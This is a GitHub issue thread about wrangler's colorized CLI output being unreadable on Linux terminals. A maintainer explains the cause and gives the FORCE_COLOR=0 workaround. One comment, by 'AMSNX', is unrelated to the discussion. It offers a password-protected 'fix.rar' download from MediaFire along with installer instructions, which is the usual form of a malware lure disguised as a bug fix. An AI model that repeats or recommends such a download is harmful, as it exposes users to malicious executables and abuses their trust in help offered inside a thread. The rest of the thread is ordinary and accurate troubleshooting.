### ISSUE TITLE
🐛 BUG: wrangler versions list (and possibly other commands) colors are unreadable on linux

### ISSUE THREAD

**Issue by taylorlee** [cloudflare/workers-sdk#6580]
### Which Cloudflare product(s) does this pertain to?

Wrangler

### What version(s) of the tool(s) are you using?

 wrangler 3.72.2

### What version of Node are you using?

v22.3.0

### What operating system and version are you using?

Ubuntu 22.04.4 LTS

### Describe the Bug

Presumably related to #5447

### Observed behavior
The new colorized logging, as used by `wrangler versions view` and some other commands, is unreadable on linux. 

Light background (cannot read keys)
![image](https://github.com/user-attachments/assets/4b7c62ba-f263-428d-86e1-d0df2949aa4f)

Dark background (cannot read values)
![image](https://github.com/user-attachments/assets/3174bc22-3a6a-4fec-ab24-7cd10b8908d1)

### Expected behavior
I would expect similar output to existing commands, like the prior `wrangler deployments view` that the new versions command replaces, or at least a setting to disable colorized output.

Old behavior light background:
![image](https://github.com/user-attachments/assets/f80338e9-a1aa-45ed-9aaa-a77a932563f9)

Old behavior dark background:
![image](https://github.com/user-attachments/assets/43c62a7b-8e0f-4450-ab54-9a963c565fbf)

### Steps to reproduce
Please provide the following:
- A minimal working subset of your worker code: any wrangler reop
- A minimal working subset of your `wrangler.toml`: anything
- Commands used to start your local dev server, including custom env and cli args - N/A
- Steps to be performed in the browser, curl commands, or a test we can run that reliably fails (at least a percent of the time) - install wrangler on linux

ps I also noticed issues with dark text on versions-upload:
![image](https://github.com/user-attachments/assets/db7a08bb-c973-4d3d-81ed-709317257758)

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by penalosa** [comment]
This is because of https://github.com/cloudflare/wrangler2/blob/santraez/c3-react-new-bundler/packages/wrangler/src/utils/render-labelled-values.ts#L28-L29, but I'm not sure why it was made gray. cc @RamIdeas.

To disable colours, you can set the `FORCE_COLOR=0` environment variable.

**Comment by penalosa** [comment]
I'll close this for now—we'll document the env var in https://github.com/cloudflare/cloudflare-docs/pull/16487
